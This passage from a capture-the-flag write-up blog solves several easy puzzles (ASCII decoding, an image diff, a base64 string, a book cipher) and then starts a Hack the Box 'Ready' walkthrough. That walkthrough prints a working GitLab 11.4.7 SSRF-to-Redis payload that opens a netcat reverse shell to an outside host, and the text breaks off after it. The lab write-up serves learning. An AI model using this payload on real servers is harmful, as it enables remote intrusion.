class="mi">43</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">27</span><span 
class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">52</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">49</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span 
class="mi">7</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span 
class="mi">1</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">61</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">44</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">12</span><span 
class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">65</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">53</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">44</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">42</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">41</span><span class="p">,</span> <span 
class="mi">4</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">26</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">89</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">43</span><span class="p">,</span> <span class="mi">38</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">26</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span 
class="mi">31</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">77</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">75</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">52</span><span 
class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">58</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">41</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> 
<span class="mi">11</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">67</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">44</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span 
class="mi">12</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">56</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">56</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span 
class="mi">12</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">22</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">chunks</span><span class="p">(</span><span class="n">lst</span><span class="p">,</span> <span class="n">n</span><span class="p">):</span>
    <span class="c1"># yield successive slices of n numbers from the list</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">lst</span><span class="p">),</span> <span class="n">n</span><span class="p">):</span>
        <span class="k">yield</span> <span class="n">lst</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span> <span class="o">+</span> <span class="n">n</span><span class="p">]</span>
<span class="c1"># each group of five numbers sums to one ASCII code</span>
<span class="n">numarr</span> <span class="o">=</span> <span class="n">chunks</span><span class="p">(</span><span class="n">nums</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">numarr</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">sum</span><span class="p">(</span><span class="n">i</span><span class="p">)),</span> <span class="n">end</span><span class="o">=</span><span class="s">""</span><span class="p">)</span>
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python3 asci.py
Hello and welcome, I would like to inform you that doing this by hand would be a long and tedious proccess, ltdh21<span class="o">{</span>7h475_pr377y_wh4ck_y000<span class="o">}</span>
</code></pre></div></div>
<hr />
<h3 id="spot-the-difference">Spot the Difference</h3>
<ul>
<li>Description: Can you find all the differences? Please circle each difference you find. If you can find all 10 differences you earn a gold star!</li>
<li>Solves: 15</li>
</ul>
<p><img src="https://jdmce.com/assets/ltdh21/SpotTheDiffimg1.png" alt="Spot the Difference" /></p>
<p>We are given two images. The name of the challenge suggests we diff the two images.</p>
<p>I wrote the following python script to diff the two images and save the result as a new image:</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">Image</span>
<span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">ImageChops</span>
<span class="n">image1</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"image1.png"</span><span class="p">)</span>
<span class="n">image2</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"image2.png"</span><span class="p">)</span>
<span class="c1"># per-channel absolute difference; pixels that match come out black</span>
<span class="n">difference</span> <span class="o">=</span> <span class="n">ImageChops</span><span class="p">.</span><span class="n">difference</span><span class="p">(</span><span class="n">image2</span><span class="p">,</span> <span class="n">image1</span><span class="p">)</span>
<span class="n">difference</span><span class="p">.</span><span class="n">save</span><span class="p">(</span><span class="s">"dif.png"</span><span class="p">)</span>
</code></pre></div></div>
<p>The resulting image looks like this:</p>
<p><img src="https://jdmce.com/assets/ltdh21/dif.png" alt="Difference" /></p>
<p>I opened the image in StegSolve and found the flag</p>
<p><img src="https://jdmce.com/assets/ltdh21/spottheflag.jpg" alt="flag" /></p>
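<p>The reason the diff image above still needed StegSolve is that a difference of one or two in the low bits is black to the eye. The following is an added example, not the writeup's script: it computes the same per-channel absolute difference on raw RGB byte buffers (the layout <code>Image.tobytes()</code> produces, so it runs without PIL), reports the bounding box of the changed region, and stretches the diff to full contrast. The sample buffers are constructed, not the challenge images.</p>

```python
#!/usr/bin/env python3
"""Pixel diff of two same-size RGB images held as raw byte buffers.

Added example, not the writeup's own script. It works on the byte layout
PIL's Image.tobytes() produces for mode "RGB" (row-major, 3 bytes per
pixel), so it runs without PIL installed; for real files feed it
Image.open(path).convert("RGB").tobytes() together with the image size.
"""


def diff_rgb(buf_a, buf_b, width, height):
    """Return (diff, bbox).

    diff is the per-channel absolute difference, the same thing
    ImageChops.difference computes. bbox is (left, top, right, bottom)
    enclosing every differing pixel, right/bottom exclusive, or None when
    the buffers are identical.
    """
    expected = width * height * 3
    if len(buf_a) != expected or len(buf_b) != expected:
        raise ValueError(f"both buffers must be {expected} bytes ({width}x{height} RGB)")
    diff = bytes(abs(a - b) for a, b in zip(buf_a, buf_b))
    changed = [
        (x, y)
        for y in range(height)
        for x in range(width)
        if any(diff[(y * width + x) * 3:(y * width + x) * 3 + 3])
    ]
    if not changed:
        return diff, None
    xs = [x for x, _ in changed]
    ys = [y for _, y in changed]
    return diff, (min(xs), min(ys), max(xs) + 1, max(ys) + 1)


def count_changed_pixels(diff):
    """Number of pixels whose difference is non-zero in any channel."""
    return sum(1 for i in range(0, len(diff), 3) if any(diff[i:i + 3]))


def amplify(diff):
    """Stretch the diff so its largest channel value becomes 255.

    Scaling every channel by 255/peak makes a low-bit difference visible
    directly, instead of flipping through bit planes in StegSolve.
    """
    peak = max(diff) if diff else 0
    if peak == 0:
        return diff
    return bytes(v * 255 // peak for v in diff)


# Constructed sample: a flat grey 4x3 image and a copy that differs by one
# or two units at pixels (2, 1) and (0, 2). Not taken from the challenge.
WIDTH, HEIGHT = 4, 3
SAMPLE_A = bytes([200] * WIDTH * HEIGHT * 3)
_b = bytearray(SAMPLE_A)
_b[(1 * WIDTH + 2) * 3 + 2] = 201   # blue channel of pixel (2, 1)
_b[(2 * WIDTH + 0) * 3 + 0] = 198   # red channel of pixel (0, 2)
SAMPLE_B = bytes(_b)

if __name__ == "__main__":
    diff, bbox = diff_rgb(SAMPLE_A, SAMPLE_B, WIDTH, HEIGHT)
    print("changed pixels:", count_changed_pixels(diff), "bbox:", bbox)
    print("peak before/after amplify:", max(diff), max(amplify(diff)))
```

<p>To write the amplified result back out with PIL, <code>Image.frombytes("RGB", (width, height), amplify(diff)).save("dif-amplified.png")</code> is all that is needed; the bounding box is a quick way to crop straight to the region worth inspecting.</p>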
<hr />
<h2 id="reverse-engineering">Reverse Engineering</h2>
<h3 id="wrong-password">Wrong password</h3>
<ul>
<li>Description: Wrong Password! You failed the vibe check.</li>
<li>Solves: 18</li>
</ul>
<p>We are given a main.exe binary. Running strings on the file we find:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ strings main.exe
!This program cannot be run in DOS mode.
/(Rich
.text
`.rdata
@.data
.reloc
h@1A
...
DecodePointer
Neve_rules
Input the password:
Correct password!
Here's the secret ;) : bHRkaDIxe3k0eV95MHVfZjB1bmRfbTN9
Wrong password, try another
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
...
</code></pre></div></div>
<p>We base64-decode the secret to reveal the flag.</p>
<hr />
<h2 id="crypto">Crypto</h2>
<h3 id="in-this-book-i-write">In this Book I write</h3>
<ul>
<li>Description: (7, 6, 3) (8, 2, 8) (1, 10, 6) (3, 8, 1) (2, 8, 2)</li>
<li>Solves: 23</li>
</ul>
<p>We are given a txt file and the description above. Each set of three numbers refers to a (paragraph, line, word) position in the file; counting each one out manually, we can construct the flag:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ltdh21{found_my_flag_for_me}
</code></pre></div></div>
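<p>Counting out by hand works for five triples but not for fifty. The following added example (my code, not the writeup's) parses the challenge's coordinate format and looks each triple up in a text, using the same 1-based (paragraph, line, word) convention; the challenge file is not reproduced here, so <code>SAMPLE_TEXT</code> and <code>SAMPLE_COORDS</code> are constructed.</p>

```python
#!/usr/bin/env python3
"""Decode (paragraph, line, word) book-cipher coordinates against a text.

Added example, not the writeup's own code. Counting is 1-based as in the
challenge description, paragraphs are separated by blank lines, and
trailing punctuation is stripped from each picked word.
"""

import re
import string

COORD_RE = re.compile(r"\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)")


def parse_coords(text):
    """Turn '(7, 6, 3) (8, 2, 8) ...' into a list of int triples."""
    return [tuple(int(n) for n in m) for m in COORD_RE.findall(text)]


def split_paragraphs(text):
    """Split on blank lines; each paragraph becomes its list of lines."""
    return [p.splitlines() for p in re.split(r"\n\s*\n", text.strip()) if p.strip()]


def decode_book_cipher(text, coords):
    """Return the word addressed by each (paragraph, line, word) triple."""
    paragraphs = split_paragraphs(text)
    words = []
    for para_no, line_no, word_no in coords:
        if min(para_no, line_no, word_no) < 1:
            raise ValueError("coordinates are 1-based")
        try:
            line = paragraphs[para_no - 1][line_no - 1]
            word = line.split()[word_no - 1]
        except IndexError:
            raise ValueError(
                f"no word at paragraph {para_no}, line {line_no}, word {word_no}"
            ) from None
        words.append(word.strip(string.punctuation))
    return words


def format_flag(words, prefix="ltdh21"):
    """Join the recovered words in the CTF's flag format."""
    return f"{prefix}{{{'_'.join(words)}}}"


# Constructed sample text and coordinates (not the challenge's file).
SAMPLE_TEXT = """\
The quick brown fox jumps over the lazy dog.
Every good boy deserves fruit, apparently.

Pack my box with five dozen liquor jugs.
How vexingly quick daft zebras jump!
"""
SAMPLE_COORDS = "(1, 1, 3) (2, 2, 4) (1, 2, 1) (2, 1, 3)"

if __name__ == "__main__":
    words = decode_book_cipher(SAMPLE_TEXT, parse_coords(SAMPLE_COORDS))
    print(format_flag(words))
```

<p>The bounds check matters more than it looks: a zero or out-of-range coordinate would otherwise silently wrap to the wrong word through Python's negative indexing, and a book cipher that is off by one produces plausible-looking garbage rather than an error.</p>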
<hr />
<p>John McEwan. Le Tour De Hack 2021 was an online CTF event organised by ENUSEC.</p>
<hr />
<h2 id="htb-ready-writeup">[HTB] Ready WriteUp</h2>
<p>Published 2021-05-15T20:00:00+01:00 at <a href="https://jdmce.com/hack%20the%20box/%5BHTB%5D-Ready-Writeup">https://jdmce.com/hack%20the%20box/%5BHTB%5D-Ready-Writeup</a>.</p>
<p><img src="https://jdmce.com/assets/ready/ready.jpg" alt="Ready" /></p>
<p>Ready is a medium difficulty machine on Hack the Box. We find an outdated instance of GitLab and exploit a known RCE vulnerability to get a shell. Some simple enumeration leads to user, and we then break out of the Docker container to get root.</p>
<p>I begin with an nmap scan:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-o</span> scans/nmap 10.10.10.220
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.91 scan initiated Mon Dec 28 10:05:11 2020 as: nmap -sC -sV -o scans/nmap 10.10.10.220</span>
Nmap scan report <span class="k">for </span>10.10.10.220
Host is up <span class="o">(</span>0.073s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae <span class="o">(</span>RSA<span class="o">)</span>
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f <span class="o">(</span>ECDSA<span class="o">)</span>
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb <span class="o">(</span>ED25519<span class="o">)</span>
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries <span class="o">(</span>15 shown<span class="o">)</span>
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/<span class="k">*</span>/edit /users /help
|_/s/ /snippets/new /snippets/<span class="k">*</span>/edit
|_http-title: GitLab is not responding <span class="o">(</span>502<span class="o">)</span>
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Mon Dec 28 10:05:54 2020 -- 1 IP address (1 host up) scanned in 43.20 seconds</span>
</code></pre></div></div>
<p>Only two ports are open, 22 and 5080. Let's check out port 5080.</p>
<p><img src="https://jdmce.com/assets/ready/gitlab-login.png" alt="Gitlab login / Register" /></p>
<p>I register an account and log in.</p>
<p><img src="https://jdmce.com/assets/ready/gitlab-welcome.jpg" alt="Gitlab Welcome Page" /></p>
<p>After clicking around for a while I notice the GitLab version number on the help page, along with a warning that GitLab is out of date.</p>
<p><img src="https://jdmce.com/assets/ready/gitlab-version.jpg" alt="Gitlab Version" /></p>
<p>Some googling reveals an RCE vulnerability in this version of GitLab:</p>
<p><a href="https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/">GitLab 11.4.7 Remote Code Execution</a></p>
<p>To get remote code execution we follow the steps in the article:</p>
<ul>
<li>Create a new project</li>
<li>Select “Import Project”</li>
<li>Click “Repo by URL”</li>
<li>At this stage we need a payload; we can use the one from the article</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 10.10.14.2 9001 -e /bin/bash \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
/ssrf.git
</code></pre></div></div>
<p>We URL-encode the payload:</p>
